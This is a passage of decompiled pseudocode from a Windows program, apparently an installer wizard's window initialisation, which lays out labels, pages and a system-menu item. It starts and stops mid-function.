				E0040357C( &_v52, 0x46a078);
				_t1586 =  *0x49eccc; // 0x230b7e0
				E0040357C( &_v52, _t1586);
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x268)), _t1487, _v52, _t622 - _v20 - _t1888 - _v20 - _t1888 - _t1888,  *((intOrPtr*)( *_t1487 + 0x250)));
				_t706 =  *0x49ef9c; // 0x230e8bc
				_t707 =  *0x49ee04; // 0x230ce78
				E0046A204( *_t1487, 2,  *0x49f31f & 0x00000004, _t707, _t706,  *((intOrPtr*)( *_t1487 + 0x1d8)));
				E00467C8C(0x6d,  &_v52);
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x26c)), _t1487, _v52, _t622 - _v20 - _t1888 - _v20 - _t1888 - _t1888,  *((intOrPtr*)( *_t1487 + 0x250)));
				E00467FCC(E00467FC4( *((intOrPtr*)( *_t1487 + 0x26c))),  *((intOrPtr*)( *_t1487 + 0x270)));
				_t1593 =  *0x49ee00; // 0x230ce54
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x2a4)), _t1487, _t1593, _t622 - _v20 - _t1888 - _v20 - _t1888 - _t1888, _t718);
				_t1594 =  *0x49ee0c; // 0x230cf58
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x2a8)), _t1487, _t1594, _t622 - _v20 - _t1888 - _v20 - _t1888 - _t1888, _t718);
				_t730 =  *0x49efa0; // 0x230e8dc
				_t731 =  *0x49ee40; // 0x230d32c
				E0046A204( *_t1487, 3,  *0x49f31f & 0x00000004, _t731, _t730,  *((intOrPtr*)( *_t1487 + 0x1dc)));
				_t1596 =  *0x49ee44; // 0x230d364
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x218)), _t1487, _t1596, _t622 - _v20 - _t1888 - _v20 - _t1888 - _t1888, _t718);
				_t1597 =  *0x49ee3c; // 0x230d314
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x220)), _t1487, _t1597, _t622 - _v20 - _t1888 - _v20 - _t1888 - _t1888, _t718);
				E00414A8C( *((intOrPtr*)( *_t1487 + 0x220)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x220)) + 0x28)) + E00467FC4( *((intOrPtr*)( *_t1487 + 0x218))));
				E00414A8C( *((intOrPtr*)( *_t1487 + 0x21c)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x21c)) + 0x28)) + _t743 + E00467FC4( *((intOrPtr*)( *_t1487 + 0x220))));
				_t755 =  *0x49ef94; // 0x230e88c
				_t756 =  *0x49edd4; // 0x230cb38
				E0046A204( *_t1487, 4,  *0x49f31f & 0x00000004, _t756, _t755,  *((intOrPtr*)( *_t1487 + 0x1e0)));
				_t1605 =  *0x49edd0; // 0x230caf4
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x23c)), _t1487, _t1605, _t1879, _t743 + E00467FC4( *((intOrPtr*)( *_t1487 + 0x220))));
				E00467FCC(E00467FC4( *((intOrPtr*)( *_t1487 + 0x23c))),  *((intOrPtr*)( *_t1487 + 0x238)));
				_t771 =  *0x49efc0; // 0x230e9ec
				_t772 =  *0x49ef64; // 0x230e5f8
				_t1504 =  *((intOrPtr*)( *_t1487 + 0x1d0));
				E0046A204( *_t1487, 5,  *0x49f31f & 0x00000004, _t772, _t771,  *((intOrPtr*)( *_t1487 + 0x1e4)));
				_t1609 =  *0x49ef68; // 0x230e624
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x2ac)), _t1487, _t1609, _t1879, _t765);
				_t1895 = E00467FC4( *((intOrPtr*)( *_t1487 + 0x2ac)));
				E00414A8C( *((intOrPtr*)( *_t1487 + 0x2b0)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2b0)) + 0x28)) + _t1895);
				E00414A8C( *((intOrPtr*)( *_t1487 + 0x2b4)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2b4)) + 0x28)) + _t1895);
				_t1615 =  *0x49ef70; // 0x230e660
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x2b4)), _t1487, _t1615, _t1879, _t1895);
				_t1896 = _t1895 + E00467FC4( *((intOrPtr*)( *_t1487 + 0x2b4)));
				E00414A8C( *((intOrPtr*)( *_t1487 + 0x2b8)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2b8)) + 0x28)) + _t1896);
				_t1940 =  *0x49f44b;
				if( *0x49f44b == 0) {
					E00414ED4( *((intOrPtr*)( *_t1487 + 0x2c8)), _t1504, 0, _t1879);
					__eflags = 0;
					E00414ED4( *((intOrPtr*)( *_t1487 + 0x2cc)), _t1504, 0, _t1879);
				} else {
					E00414A8C( *((intOrPtr*)( *_t1487 + 0x2c8)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2c8)) + 0x28)) + _t1896);
					_t1844 =  *0x49ef74; // 0x230e67c
					E00414FA8( *((intOrPtr*)( *_t1487 + 0x2c8)), _t1487, _t1844, _t1879, _t1896);
					E00414A8C( *((intOrPtr*)( *_t1487 + 0x2cc)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2cc)) + 0x28)) + _t1896);
				}
				_t805 =  *0x49efac; // 0x230e938
				E00467C8C(0x8f,  &_v52);
				E0046A204( *_t1487, 6, _t1940, _v52, _t805,  *((intOrPtr*)( *_t1487 + 0x1e8)));
				E00467C8C(0x91,  &_v52);
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x294)), _t1487, _v52, _t1879, _t1896);
				_t818 = E004989AC( *_t1487, 0xc);
				_t1897 =  *((intOrPtr*)( *_t1487 + 0x2e0));
				_t1881 = _t818 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e0)) + 0x24)) +  *((intOrPtr*)(_t1897 + 0x2c));
				_t1898 =  *((intOrPtr*)( *_t1487 + 0x294));
				_t1506 =  *((intOrPtr*)(_t1898 + 0x28));
				_t1899 =  *_t1898;
				 *((intOrPtr*)( *_t1898 + 0x4c))( *((intOrPtr*)(_t1898 + 0x30)),  *((intOrPtr*)(_t1898 + 0x2c)) - _t818 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e0)) + 0x24)) +  *((intOrPtr*)(_t1897 + 0x2c)) -  *((intOrPtr*)(_t1898 + 0x24)));
				E00467FC4( *((intOrPtr*)( *_t1487 + 0x294)));
				if( *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e0)) + 0x30)) >  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x294)) + 0x30))) {
					_t1839 =  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e0)) + 0x30)) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x294)) + 0x30)) - 1;
					_t1840 = _t1839 >> 1;
					if(_t1839 < 0) {
						asm("adc edx, 0x0");
					}
					_t1943 = _t1840 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x294)) + 0x28));
					E00414A8C( *((intOrPtr*)( *_t1487 + 0x294)), _t1840 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x294)) + 0x28)));
				}
				E00467C8C(0x8e,  &_v52);
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x2e8)), _t1487, _v52, _t1881, _t1899);
				_push(E004989BC( *_t1487, 0xd) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x294)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x294)) + 0x30)) - 1);
				_t843 = E004989BC( *_t1487, 0xc);
				_pop(_t1643);
				E00414A8C( *((intOrPtr*)( *_t1487 + 0x2e8)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e8)) + 0x28)) + E0042ED50(_t843 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e0)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e0)) + 0x30)), _t1643) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e8)) + 0x28)));
				E00414A8C( *((intOrPtr*)( *_t1487 + 0x20c)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x20c)) + 0x28)) + E0042ED50(_t843 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e0)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e0)) + 0x30)), _t1643) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e8)) + 0x28)) + E00467FC4( *((intOrPtr*)( *_t1487 + 0x2e8))));
				_t862 = E00418670( *((intOrPtr*)( *_t1487 + 0x20c))); // executed
				E0042F1C8(_t862, _t1487, _t1506,  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x20c)) + 0x28)) + E0042ED50(_t843 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e0)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e0)) + 0x30)), _t1643) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e8)) + 0x28)) + E00467FC4( *((intOrPtr*)( *_t1487 + 0x2e8))),  *((intOrPtr*)( *_t1487 + 0x294)), E0042ED50(_t843 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e0)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e0)) + 0x30)), _t1643) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e8)) + 0x28)) + E00467FC4( *((intOrPtr*)( *_t1487 + 0x2e8)))); // executed
				_t1651 =  *0x49ecac; // 0x230b6a4
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x2d8)), _t1487, _t1651,  *((intOrPtr*)( *_t1487 + 0x294)), E0042ED50(_t843 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e0)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e0)) + 0x30)), _t1643) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e8)) + 0x28)) + E00467FC4( *((intOrPtr*)( *_t1487 + 0x2e8))));
				_v64 = 0x16;
				_t868 = E00498688( *_t1487, _t1487, 0,  &_v64,  *((intOrPtr*)( *_t1487 + 0x294)), E0042ED50(_t843 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e0)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e0)) + 0x30)), _t1643) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e8)) + 0x28)) + E00467FC4( *((intOrPtr*)( *_t1487 + 0x2e8))), _t1943);
				_t1883 = _t868;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2d8)))) + 0x4c))( *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2d8)) + 0x30)), _t868);
				E00414AAC( *((intOrPtr*)( *_t1487 + 0x20c)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2d8)) + 0x24)) - E004989AC( *_t1487, 0xa) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x20c)) + 0x24)));
				E00467C8C(0x2e,  &_v52);
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x208)), _t1487, _v52, _t868,  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2d8)))));
				E00414A8C( *((intOrPtr*)( *_t1487 + 0x208)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x208)) + 0x28)) - E00467FC4( *((intOrPtr*)( *_t1487 + 0x208))));
				_t898 =  *0x49efb0; // 0x230e960
				E00467C8C(0x8c,  &_v52);
				E0046A204( *_t1487, 7, _t1943, _v52, _t898,  *((intOrPtr*)( *_t1487 + 0x1ec)));
				E00467C8C(0x8d,  &_v52);
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x29c)), _t1487, _v52, _t868,  *((intOrPtr*)( *_t1487 + 0x208)));
				_t1905 = E00467FC4( *((intOrPtr*)( *_t1487 + 0x29c)));
				E00414A8C( *((intOrPtr*)( *_t1487 + 0x228)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x228)) + 0x28)) + _t1905);
				_t1511 = _t1905;
				E00467FCC(_t1905,  *((intOrPtr*)( *_t1487 + 0x27c)));
				E00467C8C(0x23,  &_v52);
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x280)), _t1487, _v52, _t868, _t1905);
				E00467FC4( *((intOrPtr*)( *_t1487 + 0x280)));
				if( *0x49f453 != 0) {
					_t1400 =  *0x49f374; // 0x2252ae8
					if( *((intOrPtr*)(_t1400 + 8)) == 1) {
						E00414ED4( *((intOrPtr*)( *_t1487 + 0x228)), _t1511, 0, _t1883);
						_t1946 =  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x228)) + 0x28)) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x27c)) + 0x28));
						E00467FCC( *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x228)) + 0x28)) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x27c)) + 0x28)),  *((intOrPtr*)( *_t1487 + 0x27c)));
					}
				}
				_t931 =  *0x49efb4; // 0x230e980
				E00467C8C(0x96,  &_v52);
				E0046A204( *_t1487, 8, _t1946, _v52, _t931,  *((intOrPtr*)( *_t1487 + 0x1f0)));
				E00467C8C(0x97,  &_v52);
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x298)), _t1487, _v52, _t1883, _t1905);
				_t944 = E004989AC( *_t1487, 0xc);
				_t1885 = _t944 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e4)) + 0x24)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e4)) + 0x2c));
				_t1906 =  *((intOrPtr*)( *_t1487 + 0x298));
				_t1907 =  *_t1906;
				 *((intOrPtr*)( *_t1906 + 0x4c))( *((intOrPtr*)(_t1906 + 0x30)),  *((intOrPtr*)(_t1906 + 0x2c)) - _t944 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e4)) + 0x24)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e4)) + 0x2c)) -  *((intOrPtr*)(_t1906 + 0x24)));
				E00467FC4( *((intOrPtr*)( *_t1487 + 0x298)));
				if( *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e4)) + 0x30)) >  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x298)) + 0x30))) {
					_t1833 =  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e4)) + 0x30)) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x298)) + 0x30)) - 1;
					_t1834 = _t1833 >> 1;
					if(_t1833 < 0) {
						asm("adc edx, 0x0");
					}
					_t1949 = _t1834 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x298)) + 0x28));
					E00414A8C( *((intOrPtr*)( *_t1487 + 0x298)), _t1834 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x298)) + 0x28)));
				}
				E00467C8C(0x95,  &_v52);
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x2ec)), _t1487, _v52, _t1885, _t1907);
				_push(E004989BC( *_t1487, 0xd) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x298)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x298)) + 0x30)) - 1);
				_t970 = E004989BC( *_t1487, 0xc);
				_pop(_t1703);
				E00414A8C( *((intOrPtr*)( *_t1487 + 0x2ec)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2ec)) + 0x28)) + E0042ED50(_t970 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e4)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e4)) + 0x30)), _t1703) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2ec)) + 0x28)));
				E00414A8C( *((intOrPtr*)( *_t1487 + 0x210)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x210)) + 0x28)) + E0042ED50(_t970 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e4)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e4)) + 0x30)), _t1703) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2ec)) + 0x28)) + E00467FC4( *((intOrPtr*)( *_t1487 + 0x2ec))));
				_t1709 =  *0x49ecac; // 0x230b6a4
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x2dc)), _t1487, _t1709, _t1885, E0042ED50(_t970 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e4)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e4)) + 0x30)), _t1703) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2ec)) + 0x28)) + E00467FC4( *((intOrPtr*)( *_t1487 + 0x2ec))));
				_v64 = 0x16;
				_t992 = E00498688( *_t1487, _t1487, 0,  &_v64, _t1885, E0042ED50(_t970 +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e4)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2e4)) + 0x30)), _t1703) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2ec)) + 0x28)) + E00467FC4( *((intOrPtr*)( *_t1487 + 0x2ec))), _t1949);
				_t1886 = _t992;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2dc)))) + 0x4c))( *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2dc)) + 0x30)), _t992);
				E00414AAC( *((intOrPtr*)( *_t1487 + 0x210)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2dc)) + 0x24)) - E004989AC( *_t1487, 0xa) -  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x210)) + 0x24)));
				_t1719 =  *0x49ee1c; // 0x230d088
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x214)), _t1487, _t1719, _t992,  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2dc)))));
				_t1015 =  *0x49efb8; // 0x230e9a8
				E00467C8C(0x98,  &_v52);
				E0046A204( *_t1487, 9, _t1949, _v52, _t1015,  *((intOrPtr*)( *_t1487 + 0x1f4)));
				E00467C8C(0x99,  &_v52);
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x2a0)), _t1487, _v52, _t992,  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2dc)))));
				E00467FCC(E00467FC4( *((intOrPtr*)( *_t1487 + 0x2a0))),  *( *_t1487 + 0x2d0));
				E0042C060( *( *_t1487 + 0x2d0), 0);
				 *((intOrPtr*)( *( *_t1487 + 0x2d0) + 0x154)) = E004989BC( *_t1487, 0x16);
				E0044EF1C( *( *_t1487 + 0x2d0),  *( *_t1487 + 0x2d0) & 0xffffff00 | ( *0x49f31f & 0x00000001) != 0x00000000);
				_t1043 =  *0x49efa8; // 0x230e918
				E00467C8C(0x81,  &_v52);
				E0046A204( *_t1487, 0xa,  *0x49f31f & 0x00000001, _v52, _t1043,  *((intOrPtr*)( *_t1487 + 0x1f8)));
				_t1052 =  *0x49efa4; // 0x230e8f4
				E00467C8C(0x7f,  &_v52);
				E0046A204( *_t1487, 0xb,  *0x49f31f & 0x00000001, _v52, _t1052,  *((intOrPtr*)( *_t1487 + 0x1fc)));
				_t1061 =  *0x49ef98; // 0x230e8a4
				E00467C8C(0x62,  &_v52);
				E0046A204( *_t1487, 0xc,  *0x49f31f & 0x00000001, _v52, _t1061,  *((intOrPtr*)( *_t1487 + 0x200)));
				_t1070 =  *0x49ef90; // 0x230e874
				_t1071 =  *0x49edcc; // 0x230caa4
				E0046A204( *_t1487, 0xd,  *0x49f31f & 0x00000001, _t1071, _t1070,  *((intOrPtr*)( *_t1487 + 0x204)));
				_t1738 =  *0x49edc8; // 0x230ca60
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x278)), _t1487, _t1738, _t992, _t1029);
				_t1913 = E00467FC4( *((intOrPtr*)( *_t1487 + 0x278)));
				E00467FCC(_t1080,  *((intOrPtr*)( *_t1487 + 0x274)));
				E0046A204( *_t1487, 0xe,  *0x49f31f & 0x00000001, 0, 0, 0);
				_t1529 =  *0x49f35c; // 0xc
				_t1742 =  *0x49f334; // 0x229f7b8
				E0049824C( *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2c4)) + 0x44)), _t1487, _t1529, _t1742, _t992, _t1080, 0xc, 0);
				_t1743 =  *0x46a050; // 0x1
				E0041A860( *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2c4)) + 0x44)), _t1743,  *0x49f31f & 0x00000001);
				E00467C8C(0x55,  &_v52);
				_push( &_v52);
				_pop(_t1098);
				E0040357C(_t1098, 0x46a06c);
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x2c4)), _t1487, _v52, _t992, _t1080);
				E00467FC4( *((intOrPtr*)( *_t1487 + 0x2c4)));
				E00414A8C( *((intOrPtr*)( *_t1487 + 0x258)),  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2c4)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2c4)) + 0x30)));
				_t1750 =  *0x49efc4; // 0x230ea0c
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x25c)), _t1487, _t1750, _t992, _t1080);
				_t1751 =  *0x49ee20; // 0x230d0b8
				E00414FA8( *((intOrPtr*)( *_t1487 + 0x260)), _t1487, _t1751, _t992, _t1080);
				 *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x2d4)) + 0x154)) = E004989BC( *_t1487, 0x16);
				if( *0x49ec78 == 0) {
					__eflags = 0;
					E00414FA8( *((intOrPtr*)( *_t1487 + 0x284)), _t1487, 0, _t1886, _t1913);
				} else {
					E00403494( &_v52, 0x46a088);
					_t1829 =  *0x49ec78; // 0x230b540
					E0040357C( &_v52, _t1829);
					E0040357C( &_v52, 0x46a088);
					E00414FA8( *((intOrPtr*)( *_t1487 + 0x284)), _t1487, _v52, _t1886, _t1913);
				}
				if( *0x49f3b4 != 0) {
					E00450714( *((intOrPtr*)( *_t1487 + 0x270)), 1);
					E00450870();
				}
				if( *0x49f3b8 != 0) {
					E00450714( *((intOrPtr*)( *_t1487 + 0x238)), 1);
					E00450870();
				}
				if( *0x49f3bc != 0) {
					E00450714( *((intOrPtr*)( *_t1487 + 0x274)), 1);
					E00450870();
				}
				_t1914 = GetSystemMenu(E00418670( *_t1487), 0);
				AppendMenuA(_t1914, 0x800, 0, 0);
				_t1128 =  *0x49ec54; // 0x230b230
				AppendMenuA(_t1914, 0, 0x270f, E00403738(_t1128));
				E0046A2F8( *_t1487, _t1487, _t1529, _t1886, _t1914); // executed
				if( *0x49f311 == 2 ||  *0x49f311 == 0 &&  *((intOrPtr*)( *_t1487 + 0x34c)) != 0) {
					_t1133 = 1;
				} else {
					_t1133 = 0;
				}
				 *((char*)( *_t1487 + 0x334)) = _t1133;
				if( *0x49f312 == 2 ||  *0x49f312 == 0 &&  *((intOrPtr*)( *_t1487 + 0x30c)) != 0) {
					_t1134 = 1;
				} else {
					_t1134 = 0;
				}
				 *((char*)( *_t1487 + 0x335)) = _t1134;
				_v28 = 0xffffffff;
				_v29 = 0;
				if(( *0x49f31e & 0x00000010) != 0) {
					if( *((intOrPtr*)( *_t1487 + 0x314)) != 0) {
						E00414FA8( *((intOrPtr*)( *_t1487 + 0x2b0)), _t1487,  *((intOrPtr*)( *_t1487 + 0x314)), _t1886, _t1914);
						E00414FA8( *((intOrPtr*)( *_t1487 + 0x2b8)), _t1487,  *((intOrPtr*)( *_t1487 + 0x318)), _t1886, _t1914);
						E00414FA8( *((intOrPtr*)( *_t1487 + 0x2cc)), _t1487,  *((intOrPtr*)( *_t1487 + 0x31c)), _t1886, _t1914);
					} else {
						_t1345 =  *0x49f228; // 0x2268c80
						E0047E4A8(_t1345, _t1529,  &_v52);
						E00414FA8( *((intOrPtr*)( *_t1487 + 0x2b0)), _t1487, _v52, _t1886, _t1914);
						_t1350 =  *0x49f22c; // 0x2268ca0
						E0047E4A8(_t1350, _t1529,  &_v52);
						E00414FA8( *((intOrPtr*)( *_t1487 + 0x2b8)), _t1487, _v52, _t1886, _t1914);
						_t1355 =  *0x49f230; // 0x0
						E0047E4A8(_t1355, _t1529,  &_v52);
						E00414FA8( *((intOrPtr*)( *_t1487 + 0x2cc)), _t1487, _v52, _t1886, _t1914);
					}
				}
				if(( *0x49f31b & 0x00000002) == 0) {
					_t1758 =  *0x49f194; // 0x230ec2c
					E00414FA8( *((intOrPtr*)( *_t1487 + 0x20c)), _t1487, _t1758, _t1886, _t1914);
				} else {
					_t1312 =  *0x49f20c; // 0x2268c28
					E0047E4A8(_t1312, _t1529,  &_v52);
					E00403450( *_t1487 + 0x304, _t1487, _v52, _t1886, _t1914);
					_t1964 =  *0x49f114;
					if( *0x49f114 == 0) {
						E00403494( &_v24,  *((intOrPtr*)( *_t1487 + 0x34c)));
						__eflags = _v24;
						if(_v24 == 0) {
							E00403494( &_v24,  *((intOrPtr*)( *_t1487 + 0x304)));
						}
					} else {
						_t1330 =  *0x49f114; // 0x0
						E0047E67C(_t1330, _t1487, _t1529,  &_v24, _t1886, _t1914);
					}
					E0042CC94(_v24,  &_v68);
					E0042D050(_v68, _t1529,  &_v52, _t1964);
					E00403494( &_v24, _v52);
					_t1758 = _v24;
					E00414FA8( *((intOrPtr*)( *_t1487 + 0x20c)), _t1487, _v24, _t1886, _t1914);
				}
				_t1138 =  *0x49f374; // 0x2252ae8
				if( *((intOrPtr*)(_t1138 + 8)) <= 0) {
					L84:
					E0042BDFC( *((intOrPtr*)( *_t1487 + 0x27c)));
					E0044EEA8( *((intOrPtr*)( *_t1487 + 0x27c)), _t1758 & 0xffffff00 | ( *0x49f31d & 0x00000020) != 0x00000000);
					_t1145 =  *0x49f378; // 0x2252afc
					_t1147 =  *((intOrPtr*)(_t1145 + 8)) - 1;
					if(_t1147 < 0) {
						L93:
						if(_v29 != 0 ||  *0x49f13c == 0 ||  *0x49f453 == 0) {
							__eflags = _v28 - 0xffffffff;
							if(_v28 == 0xffffffff) {
								_t1148 =  *0x49f374; // 0x2252ae8
								__eflags =  *(_t1148 + 8);
								if( *(_t1148 + 8) > 0) {
									_t1215 =  *0x49f374; // 0x2252ae8
									_v36 = E0040B6DC(_t1215, 0);
									_t1529 = 0;
									__eflags = 0;
									E0046AF6C( *_t1487, 0,  *_v36, _t1922);
								}
							} else {
								_t1220 =  *0x49f374; // 0x2252ae8
								_v36 = E0040B6DC(_t1220, _v28);
								_t1222 = _v36;
								__eflags =  *(_t1222 + 0x24) & 0x00000001;
								if(( *(_t1222 + 0x24) & 0x00000001) == 0) {
									_t1529 = 0;
									E0046AF6C( *_t1487, 0,  *_v36, _t1922);
								} else {
									_t1226 =  *0x49f374; // 0x2252ae8
									E0046AF6C( *_t1487, 0,  *((intOrPtr*)(E0040B6DC(_t1226, 0))), _t1922);
									E0046AF6C( *_t1487, 1,  *_v36, _t1922);
									_t1529 =  *((intOrPtr*)( *_t1487 + 0x328));
									E0046AE0C( *_t1487, _t1487,  *((intOrPtr*)( *_t1487 + 0x328)),  *((intOrPtr*)( *_t1487 + 0x324)), _t1886, _t1914);
								}
							}
						} else {
							_t1237 =  *0x49f374; // 0x2252ae8
							_t1239 =  *((intOrPtr*)(_t1237 + 8)) - 1;
							if(_t1239 < 0) {
								L108:
								E0046836C( *_t1487);
								E004680E8( *_t1487, _t1487, _t1886, _t1914, _t2004);
								if( *0x49f453 == 0) {
									__eflags = 0;
									E00414ED4( *((intOrPtr*)( *_t1487 + 0x27c)), _t1529, 0, _t1886);
								} else {
									_t1205 = E0042A4D0( *((intOrPtr*)( *_t1487 + 0x228)));
									_t1206 =  *0x49f374; // 0x2252ae8
									_v36 = E0040B6DC(_t1206, _t1205);
									if(( *(_v36 + 0x24) & 0x00000001) != 0 || ( *0x49f31d & 0x00000010) != 0) {
										E00414ED4( *((intOrPtr*)( *_t1487 + 0x27c)), _t1529, 1, _t1886);
									} else {
										E00414ED4( *((intOrPtr*)( *_t1487 + 0x27c)), _t1529, 0, _t1886);
									}
								}
								E00414ED4( *((intOrPtr*)( *_t1487 + 0x280)), _t1529,  *((intOrPtr*)( *((intOrPtr*)( *_t1487 + 0x27c)) + 0x37)), _t1886);
								if( *0x49f453 != 0) {
									 *((intOrPtr*)( *_t1487 + 0x33c)) = E0042A4D0( *((intOrPtr*)( *_t1487 + 0x228)));
									_push(0);
									_t1529 = 0;
									E0046B0CC( *_t1487, _t1487, 0,  *((intOrPtr*)( *_t1487 + 0x338)), _t1886, _t1914);
								}
								_t1161 =  *0x49f210; // 0x2268c58
								E0047E4A8(_t1161, _t1529,  &_v52);
								E00403450( *_t1487 + 0x308, _t1487, _v52, _t1886, _t1914);
								if( *0x49f118 == 0 ||  *((char*)( *_t1487 + 0x335)) != 0) {
									_t1166 =  *_t1487;
									__eflags =  *(_t1166 + 0x30c);
									if( *(_t1166 + 0x30c) == 0) {
										L121:
										E00403494( &_v24,  *((intOrPtr*)( *_t1487 + 0x308)));
										goto L123;
									}
									E00403684( *((intOrPtr*)( *_t1487 + 0x30c)), "(Default)");
									if(__eflags != 0) {
										E00403494( &_v24,  *((intOrPtr*)( *_t1487 + 0x30c)));
										goto L123;
									}
									goto L121;
								} else {
									_t1195 =  *0x49f118; // 0x0
									E0047E67C(_t1195, _t1487, _t1529,  &_v24, _t1886, _t1914);
									L123:
